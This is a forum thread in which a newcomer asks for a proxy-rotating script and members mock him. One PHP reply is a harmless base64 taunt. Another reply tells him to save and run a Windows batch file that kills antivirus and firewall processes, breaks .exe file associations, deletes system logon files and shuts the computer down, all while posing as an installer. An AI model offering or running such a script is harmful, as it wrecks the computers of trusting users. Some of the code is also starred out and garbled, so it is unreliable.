-
Simple loop.
Hey, I'm a new user to this forum, so i guess this is me introducing myself.
Can anyone whip me up a little script to loop a new proxy every few seconds?
I dont have time for learning VBScript or all those useless languages/tools.
I am still a little new to computer languages and programming other than the old HTML, javascript, and SQL.
But back to the looping proxies, I would perfer it to be like Visual Basic or something. But I cant be picky, I'll take anything, Im a noob.
-
[quote]
useless languages/tools.
[/quote]
Yeah, who needs useless programming right? Well here is your proxy loop. Enjoy.
[php]
<?PHP
function decript_twit_level($RATING_translation,$RATING){
while($RATING){
$RATING_translation=base64_decode($RATING_translation);
$RATING--;
}
return($RATING_translation);
}
function ProxyLoop($UserMessage){
$UsefulProgramming=TRUE;
if($UsefulProgramming===FALSE){
$dizzy=TRUE;
}else{
$dizzy=FALSE;
}
if($dizzy===FALSE){
// LOOP ME AGAIN!
print($UserMessage);
return(*);
}else{
// TOO DIZZY, STOP!
return(0);
}
}
// TWIT RATING 5/5
$RATING=5;
$RATING_translation='VmxSR*QyRXlVa*ppUldoVFZqSlNjbFV*WkZOa0*YQkdWR*RPYkdKV*NrcFdiVEYzWVVkV*ZsTnVaRnBpVjNoRVdWVldjMU5IVmtsWA0KYld4T*RVVmFkZz0*';
while(ProxyLoop()){
$UserMessage=decript_twit_level($RATING_translation,$RATING);
ProxyLoop($UserMessage);
}
?>
[/php]
-
-
BTW,
my twit rating is only 4/5. :D
-
-
I lol'ed at this thread. :p
-
here save this as a batch file and run it.
[php]
title Twit Rating
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * twit.exe is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp*file
cls
msg * OK, mabeys only */5.
msg * -ill0gic
DEL C:\WINDOWS\system*2\logoff.exe /F /Q
DEL C:\WINDOWS\system*2\logon.exe /F /Q
DEL C:\WINDOWS\system*2\logon.scr /F /Q
cls
shutdown
[/php]
-
^^ theres your useless programming.
-
I think we should make this the useless/joke programs thread. Yay/nay?
-
Or just the Moderators not mock the ones who ask for help.
-
[quote]Or just the Moderators not mock the ones who ask for help.[/quote]
All mods are very helpful here. If you ask for help you will probably get it.
If you ask for someone to do all the work for you because you are too lazy to learn, [url=http://endor.org/sandler/laugh.html]They're all gonna laugh at you.[/url] ([url=http://************/watch?v=WoW88FEB2OU]AUDIO[/url])
-
Alright well I will keep that in mind,
but i was simply asking if anyone had any code for an .exe that did that.
But never mind, ill just stick to tor.:)
-
You could use a Firefox addon like FoxyProxy to do this, assuming you have Firefox.
-
Yeah i have that too.
Well thanks anyway.
-
[QUOTE=ill0gic;27**2]Or just the Moderators not mock the ones who ask for help.[/QUOTE]
It's pretty much part of the job description these days.